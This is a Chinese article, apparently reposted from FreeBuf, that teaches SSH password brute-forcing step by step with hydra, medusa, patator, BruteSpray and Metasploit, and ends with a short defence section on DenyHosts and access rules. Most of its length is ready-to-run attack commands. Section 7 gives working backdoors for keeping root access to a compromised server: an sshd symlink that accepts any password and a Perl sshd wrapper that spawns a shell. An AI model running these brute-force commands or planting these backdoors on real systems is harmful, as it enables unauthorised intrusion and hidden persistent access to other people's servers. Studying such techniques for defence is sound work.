为什么你的服务器总被入侵?Linux SSH之密码暴力破解

嵌入式ARM 2019-05-08 16:27

来源:FreeBuf,作者:simeon


对于Linux操作系统来说,一般通过VNC、Teamviewer和SSH等工具来进行远程管理,SSH是 Secure Shell的缩写,由IETF的网络小组(Network Working Group)所制定;SSH 为建立在应用层基础上的安全协议。SSH 是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。


利用SSH协议可以有效防止远程管理过程中的信息泄露问题。SSH客户端适用于多种平台,几乎所有UNIX平台—包括HP-UX、Linux、AIX、Solaris、Digital UNIX、Irix,以及其他平台都可运行SSH。Kali Linux渗透测试平台默认配置SSH服务。SSH进行服务器远程管理,仅仅需要知道服务器的IP地址、端口、管理账号和密码,即可进行服务器的管理,网络安全遵循木桶原理,只要通过SSH撕开一个口子,对渗透人员来时这将是一个新的世界。


本文对目前流行的ssh密码暴力破解工具进行实战研究、分析和总结,对渗透攻击测试和安全防御具有一定的参考价值。


一、SSH密码暴力破解应用场景和思路


1.应用场景

(1)通过Structs等远程命令执行获取了root权限。

(2)通过webshell提权获取了root权限

(3)通过本地文件包含漏洞,可以读取linux本地所有文件。

(4)获取了网络入口权限,可以对内网计算机进行访问。

(5)外网开启了SSH端口(默认或者修改了端口),可以进行SSH访问。


在前面的这些场景中,可以获取shadow文件,对其进行暴力破解,以获取这些账号的密码,但在另外的一些场景中,无任何漏洞可用,这个时候就需要对SSH账号进行暴力破解。


2.思路

(1)对root账号进行暴力破解

(2)使用中国姓名top1000作为用户名进行暴力破解

(3)使用top 10000 password字典进行密码破解

(4)利用掌握信息进行社工信息整理并生成字典暴力破解

(5)信息的综合利用以及循环利用


二、使用hydra暴力破解SSH密码


hydra**是世界顶级密码**暴力密码破解工具,支持几乎所有协议的在线密码破解,功能强大,其密码能否被破解关键取决于破解字典是否足够强大。在网络安全渗透过程中是一款必备的测试工具,配合社工库进行社会工程学攻击,有时会获得意想不到的效果。


1.简介


hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码,目前已经被Backtrack和kali等渗透平台收录,除了命令行下的hydra外,还提供了hydragtk版本(有图形界面的hydra),官网网站:http://www.thc.org/thc-hydra,目前最新版本为7.6下载地址:http://www.thc.org/releases/hydra-7.6.tar.gz,它可支持AFP,Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, uHTTP-FORM-GET,HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET,HTTPS-FORM-POST,HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP,NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES,RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH(v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP等类型密码。


2.安装


(1)Debian和Ubuntu安装


如果是Debian和Ubuntu发行版,源里自带hydra,直接用apt-get在线安装:


sudo apt-get install libssl-dev libssh-devlibidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-devfirebird2.1-dev libncp-dev hydra


Redhat/Fedora发行版的下载源码包编译安装,先安装相关依赖包:


yum install openssl-devel pcre-develncpfs-devel postgresql-devel libssh-devel subversion-devel


(2)centos安装


# tar zxvf hydra-7.6-src.tar.gz# cd hydra-6.0-src# ./configure# make# make install


3.使用hydra


BT5和kali都默认安装了hydra,在kali中单击“kali Linux”-“Password Attacks”-“Online Attacks”-“hydra”即可打开hydra。在centos终端中输入命令/usr/local/bin/hydra即可打开该暴力破解工具,除此之外还可以通过hydra-wizard.sh命令进行向导式设置进行密码破解,如图1所示。


图1使用hydra-wizard.sh进行密码破解


如果不安装libssh,运行hydra破解账号时会出现错误,如图2所示,显示错误提示信息:[ERROR]Compiled without LIBSSH v0.4.x support, module is not available! 在centos下依次运行以下命令即可解决:


yum install cmakewget http://www.libssh.org/files/0.4/libssh-0.4.8.tar.gz    tar zxf libssh-0.4.8.tar.gzcd libssh-0.4.8mkdir buildcd buildcmake -DCMAKE_INSTALL_PREFIX=/usr-DCMAKE_BUILD_TYPE=Debug -DWITH_SSH1=ON ..    make    make installcd /test/ssh/hydra-7.6  (此为下载hydar解压的目录)make clean./configuremakemake install



图2 出现libssh模块缺少错误


4、hydra参数详细说明

hydra [[[-l LOGIN|-L FILE] [-p PASS|-PFILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-wTIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46][service://server[:PORT][/OPT]]


-l LOGIN 指定破解的用户名称,对特定用户破解。

-L FILE 从文件中加载用户名进行破解。

-p PASS小写p指定密码破解,少用,一般是采用密码字典。

-P FILE 大写字母P,指定密码字典。

-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。

-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。

-t TASKS 同时运行的连接的线程数,每一台主机默认为16。

-M FILE 指定服务器目标列表文件一行一条

-w TIME 设置最大超时的时间,单位秒,默认是30s。

-o FILE 指定结果输出文件。

-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。

-v / -V 显示详细过程。

-R 继续从上一次进度接着破解。

-S 采用SSL链接。

-s PORT 可通过这个参数指定非默认端口。

-U 服务模块使用细节

-h 更多的命令行选项(完整的帮助)

server 目标服务器名称或者IP(使用这个或-M选项)

service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get}http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysqloracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icqsapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等

OPT 一些服务模块支持额外的输入(-U用于模块的帮助)


5.破解SSH账号


破解SSH账号有两种方式,一种是指定账号破解,一种是指定用户列表破解。详细命令如下:


(1)hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh


例如输入命令“hydra -l root -P pwd2.dic -t 1 -vV -e ns 192.168.44.139 ssh”对IP地址为“192.168.44.139”的root账号密码进行破解,如图3所示,破解成功后显示其详细信息。


“hydra -l root -P pwd2.dic -t 1 -vV -e ns -o save.log 192.168.44.139 ssh ”将扫描结果保存在save.log文件中,打开该文件可以看到成功破解的结果,如图4所示。


图3破解SSH账号


图4查看破解日志


三、使用Medusa暴力破解SSH密码


1. Medusa简介


Medusa(美杜莎)是一个速度快,支持大规模并行,模块化,爆破登录。可以同时对多个主机,用户或密码执行强力测试。Medusa和hydra一样,同样属于在线密码破解工具。不同的是,medusa 的稳定性相较于hydra 要好很多,但其支持模块要比 hydra 少一些。 Medusa是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare),NNTP,PcAnywhere, POP3, PostgreSQL, rexec, RDP、rlogin, rsh, SMBNT,SMTP(AUTH/VRFY),SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC、Generic Wrapper以及Web表单的密码爆破工具,官方网站:http://foofus.net/goons/jmk/medusa/medusa.html。目前最新版本2.2,美中不足的是软件从2015年后未进行更新,kali默认自带该软件,软件下载地址:


https://github.com/jmk-foofus/medusa

https://github.com/jmk-foofus/medusa/archive/2.2.tar.gz


2.安装medusa


(1)git克隆安装


git clonehttps://github.com/jmk-foofus/medusa.git


(2)手动编译和安装medusa


./configuremakemake install



安装完成后,会将medusa的一些modules 文件复制到/usr/local/lib/medusa/modules文件夹。


3.Medusa参数


Medusa [-hhost|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module[OPT]


-h [TEXT] 目标主机名称或者IP地址

-H [FILE] 包含目标主机名称或者IP地址文件

-u [TEXT] 测试的用户名

-U [FILE] 包含测试的用户名文件

-p [TEXT] 测试的密码

-P [FILE] 包含测试的密码文件

-C [FILE] 组合条目文件

-O [FILE] 日志信息文件

-e [n/s/ns] n代表空密码,s代表为密码与用户名相同

-M [TEXT] 模块执行名称

-m [TEXT] 传递参数到模块

-d 显示所有的模块名称

-n [NUM] 使用非默认Tcp端口

-s 启用SSL

-r [NUM] 重试间隔时间,默认为3秒

-t [NUM] 设定线程数量

-T 同时测试的主机总数

-L 并行化,每个用户使用一个线程

-f 在任何主机上找到第一个账号/密码后,停止破解

-F 在任何主机上找到第一个有效的用户名/密码后停止审计。

-q 显示模块的使用信息

-v [NUM] 详细级别(0-6)

-w [NUM] 错误调试级别(0-10)

-V 显示版本

-Z [TEXT] 继续扫描上一次


4.破解单一服务器SSH密码


(1)通过文件来指定host和user,host.txt为目标主机名称或者IP地址,user.txt指定需要暴力破解的用户名,密码指定为password

./medusa -M ssh -H host.txt -U users.txt -p password


(2)对单一服务器进行密码字典暴力破解,如图5所示,破解成功后会显示success字样,具体命令如下:


medusa -M ssh -h 192.168.157.131 -u root -Pnewpass.txt


图5破解SSH口令成功


如果使用Cltrl+Z结束了破解过程,则还可以根据屏幕提示,在后面继续恢复破解,在上例中恢复破解,只需要在命令末尾增加“-Z h1u1.”即可。也即其命令为:


medusa -M ssh -h192.168.157.131 -u root -P newpass.txt -Z h1u1.


5.破解某个IP地址主机破解成功后立刻停止,并测试空密码以及与用户名一样的密码


medusa -M ssh -h 192.168.157.131 -u root-P /root/newpass.txt -e ns -F


执行效果如图6所示,通过命令查看字典文件newpass.txt,可以看到root密码位于第8行,而在破解结果中显示第一行就破解成功了,说明先执行了“-e ns”参数命令,对空密码和使用用户名作为密码来进行破解。


图6使用空密码和用户名作为密码进行破解


技巧:加-O ssh.log 可以将成功破解的记录记录到ssh.log文件中。


四、使用patator暴力破解SSH密码


1.下载并安装patator


git clone https://github.com/lanjelot/patator.gitcd patatorpython setup.py install


2.使用参数


执行./patator.py即可获取详细的帮助信息

Patator v0.7(https://github.com/lanjelot/patator)

Usage: patator.py module —help


可用模块:

  • ftp_login : 暴力破解FTP

    +ssh_login : 暴力破解 SSH

    +telnet_login : 暴力破解 Telnet

    +smtp_login : 暴力破解 SMTP

    +smtp_vrfy : 使用SMTP VRFY进行枚举

    +smtp_rcpt : 使用 SMTP RCPTTO枚举合法用户

    +finger_lookup : 使用Finger枚举合法用户

    +http_fuzz : 暴力破解 HTTP

    +ajp_fuzz : 暴力破解 AJP

    +pop_login : 暴力破解 POP3

    +pop_passd : 暴力破解 poppassd(http://netwinsite.com/poppassd/)

    +imap_login : 暴力破解 IMAP4

    +ldap_login : 暴力破解 LDAP

    +smb_login : 暴力破解 SMB

    +smb_lookupsid : 暴力破解 SMB SID-lookup

    +rlogin_login : 暴力破解 rlogin

    +vmauthd_login : 暴力破解 VMware Authentication Daemon

    +mssql_login : 暴力破解 MSSQL

    +oracle_login : 暴力破解 Oracle

    +mysql_login : 暴力破解 MySQL

    +mysql_query : 暴力破解 MySQLqueries

    +rdp_login : 暴力破解 RDP(NLA)

    +pgsql_login : 暴力破解PostgreSQL

    +vnc_login : 暴力破解 VNC

    +dns_forward : 正向DNS 查询

    +dns_reverse : 反向 DNS 查询

    +snmp_login : 暴力破解 SNMPv1/2/3

    +ike_enum : 枚举 IKE 传输

    +unzip_pass : 暴力破解 ZIP加密文件

    +keystore_pass : 暴力破解Java keystore files的密码

    +sqlcipher_pass : 暴力破解加密数据库SQL Cipher的密码-

    +umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes

    +tcp_fuzz : Fuzz TCP services

    +dummy_test : 测试模块


3.实战破解


(1)查看详细帮助信息


执行“./patator.pyssh_login –help“命令后即可获取其参数的详细使用信息,如图7所示,在ssh暴力破解模块ssh_login中需要设置host,port,user,password等参数。


图7查看帮助信息


(2)执行单一用户密码破解


对主机192.168.157.131,用户root,密码文件为/root/newpass.txt进行破解,如图8所示,破解成功后会显示SSH登录标识“SSH-2.0-OpenSSH_7.5p1Debian-10“,破解不成功会显示” Authentication failed. “提示信息,其破解时间为2秒,速度很快!


./patator.py ssh_login host=192.168.157.131user=root password=FILE0 0=/root/newpass.txt



图8破解单一用户密码


(3)破解多个用户。用户文件为/root/user.txt,密码文件为/root/newpass.txt,破解效果如图9所示。


./patator.py ssh_login host=192.168.157.131user=FILE1 1=/root/user.txt password=FILE0 0=/root/newpass.txt



图9使用patator破解多用户的密码


五、使用BrutesPray暴力破解SSH密码


BruteSpray是一款基于nmap扫描输出的gnmap/XML文件,自动调用Medusa对服务进行爆破(Medusa美杜莎是一款端口爆破工具,在前面的文章中对其进行了介绍),声称速度比hydra快,其官方项目地址:https://github.com/x90skysn3k/brutespray。BruteSpray调用medusa,其说明中声称支持ssh、ftp、telnet、vnc、mssql、mysql、postgresql、rsh、imap、nntp、pcanywhere、pop3、rexec、rlogin、smbnt、smtp、svn和vmauthd协议账号暴力破解。


1.安装及下载


(1)普通下载地址


https://codeload.github.com/x90skysn3k/brutespray/zip/master


(2)kali下安装


BruteSpray默认没有集成到kali Linux中,需要手动安装,有的需要先在kali中执行更新,apt-get update 后才能执行安装命令:


apt-getinstall brutespray


kali Linux默认安装其用户和密码字典文件位置:/usr/share/brutespray/wordlist。


(3)手动安装


git clonehttps://github.com/x90skysn3k/brutespray.gitcdbrutespraypipinstall -r requirements.txt


注意如果在其它环境安装需要安装medusa,否则会执行报错。


2.BrutesPray使用参数


用法: brutespray.py [-h] -f FILE [-o OUTPUT] [-sSERVICE] [-t THREADS] [-T HOSTS] [-U USERLIST] [-P PASSLIST] [-u USERNAME] [-pPASSWORD] [-c] [-i]


用法: python brutespray.py <选项>


选项参数:


-h, —help 显示帮助信息并退出


菜单选项:


-f FILE, —file FILE 参数后跟一个文件名, 解析nmap输出的GNMAP或者XML文件

-o OUTPUT, —output OUTPUT 包含成功尝试的目录

-s SERVICE, —service SERVICE 参数后跟一个服务名, 指定要攻击的服务

-t THREADS, —threads THREADS 参数后跟一数值,指定medusa线程数

-T HOSTS, —hosts HOSTS 参数后跟一数值,指定同时测试的主机数

-U USERLIST, —userlist USERLIST 参数后跟用户字典文件

-P PASSLIST, —passlist PASSLIST 参数后跟密码字典文件

-u USERNAME, —username USERNAME 参数后跟用户名,指定一个用户名进行爆破

-p PASSWORD, —password PASSWORD 参数后跟密码,指定一个密码进行爆破

-c, —continuous 成功之后继续爆破

-i, —interactive 交互模式


3.使用nmap进行端口扫描


(1)扫描整个内网C段


nmap -v192.168.17.0/24 -oX nmap.xml


(2)扫描开放22端口的主机


nmap -A-p 22 -v 192.168.17.0/24 -oX 22.xml


(3)扫描存活主机


nmap –sP 192.168.17.0/24-oX nmaplive.xml


(4)扫描应用程序以及版本号


nmap -sV –O 192.168.17.0/24 -oX nmap.xml


4.暴力破解SSH密码


(1)交互模式破解


python brutespray.py --file nmap.xml –i


执行后,程序会自动识别nmap扫描结果中的服务,根据提示选择需要破解的服务,线程数、同时暴力破解的主机数,指定用户和密码文件,如图 10所示。Brutespray破解成功后在屏幕上会显示“SUCCESS ”信息。


图10交互模式破解密码


(2)通过指定字典文件爆破SSH


pythonbrutespray.py --file 22.xml -U /usr/share/brutespray/wordlist/ssh/user -P/usr/share/brutespray/wordlist/ssh/password --threads 5 --hosts 5


注意:


brutespray新版本的wordlist地址为/usr/share/brutespray/wordlist,其下包含了多个协议的用户名和密码,可以到该目录完善这些用户文件和密码文件。22.xml为nmap扫描22端口生成的文件。


(3)暴力破解指定的服务


pythonbrutespray.py --file nmap.xml --service ftp,ssh,telnet --threads 5 --hosts 5


(4)指定用户名和密码进行暴力破解


当在内网已经获取了一个密码后,可以用来验证nmap扫描中的开放22端口的服务器,如图11所示,对192.168.17.144和192.168.17.147进行root密码暴力破解,192.168.17.144密码成功破解。


pythonbrutespray.py --file 22.xml -u root -p toor --threads 5 --hosts 5./brutespray.py -f 22.xml -u root -p toor--threads 5 --hosts 5



图11 对已知口令进行密码破解


(5)破解成功后继续暴力破解


python brutespray.py --file nmap.xml--threads 5 --hosts 5 –c


前面的命令是默认破解成功一个帐号后,就不再继续暴力破解了,此命令是对所有账号进行暴力破解,其时间稍长。


(6)使用Nmap扫描生成的nmap.xml进行暴力破解


pythonbrutespray.py --file nmap.xml --threads 5 --hosts 5


5.查看破解结果


Brutespray这一点做的非常好,默认会在程序目录/brutespray-output/目录下生成ssh-success.txt文件,使用cat ssh-success.txt命令即可查看破解成功的结果,如图12所示。


图12查看破解成功的记录文件


也可以通过命令搜索ssh-success 文件的具体位置:find / -name ssh-success.txt


6.登录破解服务器


使用ssh user@host命令登录host服务器。例如登录192.168.17.144:


ssh root@192.168.17.144


输入密码即可正常登录服务器192.168.17.144。


六、Msf下利用ssh_login模块进行暴力破解


1.msf下有关SSH相关模块


在kali中执行“msfconsole”-“search ssh”后会获取相关所有ssh模块,如图13所示。


图13 msf下所有SSH漏洞以及相关利用模块


2.SSH相关功能模块分析


(1)SSH用户枚举


此模块使用基于时间的攻击枚举用户OpenSSH服务器。在一些OpenSSH的一些版本配置,OpenSSH会返回一个“没有权限”无效用户的错误比有效用户快。使用命令如下:


use auxiliary/scanner/ssh/ssh_enumusersset rhost 191.168.17.147set USER_FILE  /root/userrun


使用info命令可以查看该模块的所有信息,执行效果如图14所示,实测该功能有一些限制,仅仅对OpenSSH某些版本效果比较好。


图14 openssh用户枚举


(2)SSH版本扫描


查看远程主机的SSH服务器版本信息,命令如下:


use auxiliary/scanner/ssh/ssh_versionset rhosts 192.168.157.147run


执行效果如图15所示,分别对centos服务器地址192.168.157.147和kali linux 地址192.168.157.144进行扫描,可以看出一个是SSH-2.0-OpenSSH_5.8p1Debian-1ubuntu3,另外一个是SSH-2.0-OpenSSH_7.5p1 Debian-10,看到第一个版本,第一时间就可以想到如果拿到权限可以安装ssh后门。


图15扫描ssh版本信息


(3)SSH暴力破解


ssh暴力破解模块“auxiliary/scanner/ssh/ssh_login”可以对单机进行单用户,单密码进行扫描破解,也可以使用密码字典和用户字典进行破解,按照提示进行设置即可。下面使用用户名字典以及密码字典进行暴力破解:


use auxiliary/scanner/ssh/ssh_loginsetrhosts 192.168.17.147setPASS_FILE /root/pass.txtsetUSER_FILE /root/user.txtrun



如图16所示,对IP地址192.168.17.147进行暴力破解,成功获取root账号密码,网上有人写文章说可以直接获取shell,实际测试并否如此,通过sessions -l可以看到msf确实建立会话,但切换(sessions -i 1)到会话一直没有反应。


图16使用msf暴力破解ssh密码


七、ssh后门


1. 软连接后门


ln -sf /usr/sbin/sshd /tmp/su; /tmp/su-oPort=33223;


经典后门使用ssh root@x.x.x.x -p 33223直接对sshd建立软连接,之后用任意密码登录即可。


但这隐蔽性很弱,一般的rookit hunter这类的防护脚本可扫描到。


2.SSH Server wrapper后门


(1)复制sshd到bin目录


cd /usr/sbinmv sshd ../bin


(2)编辑sshd


vi sshd //加入以下内容并保存#!/usr/bin/perlexec"/bin/sh"if(getpeername(STDIN)=~/^..LF/);exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;


(3)修改权限


chmod 755 sshd


(4)使用socat


socat STDIOTCP4:target_ip:22,sourceport=19526


如果没有安装socat需要进行安装并编译


wget http://www.dest-unreach.org/socat/download/socat-1.7.3.2.tar.gztar -zxvf socat-1.7.3.2.tar.gzcd socat-1.7.3.2./configuremakemake install


(5)使用ssh root@ target_ip即可免密码登录


3.ssh公钥免密


将本地计算机生成公私钥,将公钥文件复制到需要连接的服务器上的~/.ssh/authorized_keys文件,并设置相应的权限,即可免密码登录服务器。


chmod 600 ~/.ssh/authorized_keyschmod 700 ~/.ssh


八、ssh暴力破解命令总结及分析


1.所有工具的比较


通过对hydra、medusa、patator、brutepray以及msf下的ssh暴力破解测试,总结如下:


(1)每款软件都能成功对ssh账号以及密码进行破解。

(2)patator和brutepray是通过python语言编写,但brutepray需要medusa配合支持。

(3)hydra和medusa是基于C语言编写的,需要进行编译。

(4)brutepray基于nmap扫描结果来进行暴力破解,在对内网扫描后进行暴力破解效果好。

(5)patator基于python,速度快,兼容性好,可以在windows或者linux下稍作配置即可使用。

(6)如果具备kali条件或者PentestBox下,使用msf进行ssh暴力破解也不错。

(7)brutepray会自动生成破解成功日志文件/brutespray-output/ssh-success.txt;hydra加参数“-o save.log”记录破解成功到日志文件save.log,medusa加“-O ssh.log”参数可以将成功破解的记录记录到ssh.log文件中;patator可以加参数“-x ignore:mesg=’Authentication failed.’”来忽略破解失败的尝试,而仅仅显示成功的破解。


2.命令总结


(1)hydra破解ssh密码


hydra -lroot  -P pwd2.dic -t 1 -vV -e ns 192.168.44.139sshhydra -lroot  -P pwd2.dic -t 1 -vV -e ns  -o save.log  192.168.44.139  ssh


(2)medusa破解ssh密码


medusa -M ssh -h 192.168.157.131 -u root -Pnewpass.txtmedusa -M ssh -h192.168.157.131 -u root -P /root/newpass.txt -e ns –F


(3)patator破解ssh密码


./patator.py ssh_login host=192.168.157.131user=root password=FILE0 0=/root/newpass.txt -x ignore:mesg='Authenticationfailed.'./patator.py ssh_login host=192.168.157.131user=FILE1 1=/root/user.txt password=FILE0 0=/root/newpass.txt -x ignore:mesg='Authenticationfailed.'

如果不是本地安装,则使用patator执行即可。


(4)brutespray暴力破解ssh密码


nmap -A-p 22 -v 192.168.17.0/24 -oX 22.xmlpythonbrutespray.py --file 22.xml -u root -p toor --threads 5 --hosts 5


(5)msf暴力破解ssh密码


use auxiliary/scanner/ssh/ssh_loginset rhosts192.168.17.147setPASS_FILE /root/pass.txtsetUSER_FILE /root/user.txtrun


九、 SSH暴力破解安全防范


1.修改/etc/ssh/sshd_config默认端口为其它端口。例如设置端口为2232,则port=2232


2.在/etc/hosts.allow中设置允许的IP访问,例如sshd:192.168.17.144:allow


3.使用DenyHosts软件来设置,其下载地址:


https://sourceforge.net/projects/denyhosts/files/denyhosts/2.6/DenyHosts-2.6.tar.gz/download


(1)安装cdDenyHosts


# tar-zxvf DenyHosts-2.6.tar.gz # cdDenyHosts-2.6 # pythonsetup.py install


默认是安装到/usr/share/denyhosts目录的。


(2)配置cdDenyHosts


# cd/usr/share/denyhosts/ # cpdenyhosts.cfg-dist denyhosts.cfg # videnyhosts.cfg


PURGE_DENY= 50m #过多久后清除已阻止IP

HOSTS_DENY= /etc/hosts.deny #将阻止IP写入到hosts.deny

BLOCK_SERVICE= sshd #阻止服务名

DENY_THRESHOLD_INVALID= 1 #允许无效用户登录失败的次数

DENY_THRESHOLD_VALID= 10 #允许普通用户登录失败的次数

DENY_THRESHOLD_ROOT= 5 #允许root登录失败的次数

WORK_DIR= /usr/local/share/denyhosts/data #将deny的host或ip纪录到Work_dir中

DENY_THRESHOLD_RESTRICTED= 1 #设定 deny host 写入到该资料夹

LOCK_FILE= /var/lock/subsys/denyhosts #将DenyHOts启动的pid纪录到LOCK_FILE中,已确保服务正确启动,防止同时启动多个服务。

HOSTNAME_LOOKUP=NO#是否做域名反解

ADMIN_EMAIL= #设置管理员邮件地址

DAEMON_LOG= /var/log/denyhosts #自己的日志文件

DAEMON_PURGE= 10m #该项与PURGE_DENY 设置成一样,也是清除hosts.deniedssh 用户的时间。


(3)设置启动脚本


# cpdaemon-control-dist daemon-control # chownroot daemon-control # chmod700 daemon-control


完了之后执行daemon-contronstart就可以了。


#./daemon-control start



如果要使DenyHosts每次重起后自动启动还需做如下设置:


# ln -s/usr/share/denyhosts/daemon-control /etc/init.d/denyhosts #chkconfig --add denyhosts #chkconfig denyhosts on#service denyhosts start


可以看看/etc/hosts.deny内是否有禁止的IP,有的话说明已经成功了。

以上内容来之本次专题研究内容之一,只有踏踏实实的做技术研究,才发现研究越多,知识面扩展越多。


嵌入式ARM 关注这个时代最火的嵌入式ARM,你想知道的都在这里。
评论
  • Ubuntu20.04默认情况下为root账号自动登录,本文介绍如何取消root账号自动登录,改为通过输入账号密码登录,使用触觉智能EVB3568鸿蒙开发板演示,搭载瑞芯微RK3568,四核A55处理器,主频2.0Ghz,1T算力NPU;支持OpenHarmony5.0及Linux、Android等操作系统,接口丰富,开发评估快人一步!添加新账号1、使用adduser命令来添加新用户,用户名以industio为例,系统会提示设置密码以及其他信息,您可以根据需要填写或跳过,命令如下:root@id
    Industio_触觉智能 2025-01-17 14:14 145浏览
  • 2024年是很平淡的一年,能保住饭碗就是万幸了,公司业绩不好,跳槽又不敢跳,还有一个原因就是老板对我们这些员工还是很好的,碍于人情也不能在公司困难时去雪上加霜。在工作其间遇到的大问题没有,小问题还是有不少,这里就举一两个来说一下。第一个就是,先看下下面的这个封装,你能猜出它的引脚间距是多少吗?这种排线座比较常规的是0.6mm间距(即排线是0.3mm间距)的,而这个规格也是我们用得最多的,所以我们按惯性思维来看的话,就会认为这个座子就是0.6mm间距的,这样往往就不会去细看规格书了,所以这次的运气
    wuliangu 2025-01-21 00:15 318浏览
  • 嘿,咱来聊聊RISC-V MCU技术哈。 这RISC-V MCU技术呢,简单来说就是基于一个叫RISC-V的指令集架构做出的微控制器技术。RISC-V这个啊,2010年的时候,是加州大学伯克利分校的研究团队弄出来的,目的就是想搞个新的、开放的指令集架构,能跟上现代计算的需要。到了2015年,专门成立了个RISC-V基金会,让这个架构更标准,也更好地推广开了。这几年啊,这个RISC-V的生态系统发展得可快了,好多公司和机构都加入了RISC-V International,还推出了不少RISC-V
    丙丁先生 2025-01-21 12:10 586浏览
  • 数字隔离芯片是一种实现电气隔离功能的集成电路,在工业自动化、汽车电子、光伏储能与电力通信等领域的电气系统中发挥着至关重要的作用。其不仅可令高、低压系统之间相互独立,提高低压系统的抗干扰能力,同时还可确保高、低压系统之间的安全交互,使系统稳定工作,并避免操作者遭受来自高压系统的电击伤害。典型数字隔离芯片的简化原理图值得一提的是,数字隔离芯片历经多年发展,其应用范围已十分广泛,凡涉及到在高、低压系统之间进行信号传输的场景中基本都需要应用到此种芯片。那么,电气工程师在进行电路设计时到底该如何评估选择一
    华普微HOPERF 2025-01-20 16:50 122浏览
  • 故障现象 一辆2007款日产天籁车,搭载VQ23发动机(气缸编号如图1所示,点火顺序为1-2-3-4-5-6),累计行驶里程约为21万km。车主反映,该车起步加速时偶尔抖动,且行驶中加速无力。 图1 VQ23发动机的气缸编号 故障诊断接车后试车,发动机怠速运转平稳,但只要换挡起步,稍微踩下一点加速踏板,就能感觉到车身明显抖动。用故障检测仪检测,发动机控制模块(ECM)无故障代码存储,且无失火数据流。用虹科Pico汽车示波器测量气缸1点火信号(COP点火信号)和曲轴位置传感器信
    虹科Pico汽车示波器 2025-01-23 10:46 70浏览
  • 现在为止,我们已经完成了Purple Pi OH主板的串口调试和部分配件的连接,接下来,让我们趁热打铁,完成剩余配件的连接!注:配件连接前请断开主板所有供电,避免敏感电路损坏!1.1 耳机接口主板有一路OTMP 标准四节耳机座J6,具备进行音频输出及录音功能,接入耳机后声音将优先从耳机输出,如下图所示:1.21.2 相机接口MIPI CSI 接口如上图所示,支持OV5648 和OV8858 摄像头模组。接入摄像头模组后,使用系统相机软件打开相机拍照和录像,如下图所示:1.3 以太网接口主板有一路
    Industio_触觉智能 2025-01-20 11:04 194浏览
  •  万万没想到!科幻电影中的人形机器人,正在一步步走进我们人类的日常生活中来了。1月17日,乐聚将第100台全尺寸人形机器人交付北汽越野车,再次吹响了人形机器人疯狂进厂打工的号角。无独有尔,银河通用机器人作为一家成立不到两年时间的创业公司,在短短一年多时间内推出革命性的第一代产品Galbot G1,这是一款轮式、双臂、身体可折叠的人形机器人,得到了美团战投、经纬创投、IDG资本等众多投资方的认可。作为一家成立仅仅只有两年多时间的企业,智元机器人也把机器人从梦想带进了现实。2024年8月1
    刘旷 2025-01-21 11:15 658浏览
  • 临近春节,各方社交及应酬也变得多起来了,甚至一月份就排满了各式约见。有的是关系好的专业朋友的周末“恳谈会”,基本是关于2025年经济预判的话题,以及如何稳定工作等话题;但更多的预约是来自几个客户老板及副总裁们的见面,他们为今年的经济预判与企业发展焦虑而来。在聊天过程中,我发现今年的聊天有个很有意思的“点”,挺多人尤其关心我到底是怎么成长成现在的多领域风格的,还能掌握一些经济趋势的分析能力,到底学过哪些专业、在企业管过哪些具体事情?单单就这个一个月内,我就重复了数次“为什么”,再辅以我上次写的:《
    牛言喵语 2025-01-22 17:10 174浏览
  •     IPC-2581是基于ODB++标准、结合PCB行业特点而指定的PCB加工文件规范。    IPC-2581旨在替代CAM350格式,成为PCB加工行业的新的工业规范。    有一些免费软件,可以查看(不可修改)IPC-2581数据文件。这些软件典型用途是工艺校核。    1. Vu2581        出品:Downstream     
    电子知识打边炉 2025-01-22 11:12 134浏览
  • 高速先生成员--黄刚这不马上就要过年了嘛,高速先生就不打算给大家上难度了,整一篇简单但很实用的文章给大伙瞧瞧好了。相信这个标题一出来,尤其对于PCB设计工程师来说,心就立马凉了半截。他们辛辛苦苦进行PCB的过孔设计,高速先生居然说设计多大的过孔他们不关心!另外估计这时候就跳出很多“挑刺”的粉丝了哈,因为翻看很多以往的文章,高速先生都表达了过孔孔径对高速性能的影响是很大的哦!咋滴,今天居然说孔径不关心了?别,别急哈,听高速先生在这篇文章中娓娓道来。首先还是要对各位设计工程师的设计表示肯定,毕竟像我
    一博科技 2025-01-21 16:17 158浏览
我要评论
0
点击右上角,分享到朋友圈 我知道啦
请使用浏览器分享功能 我知道啦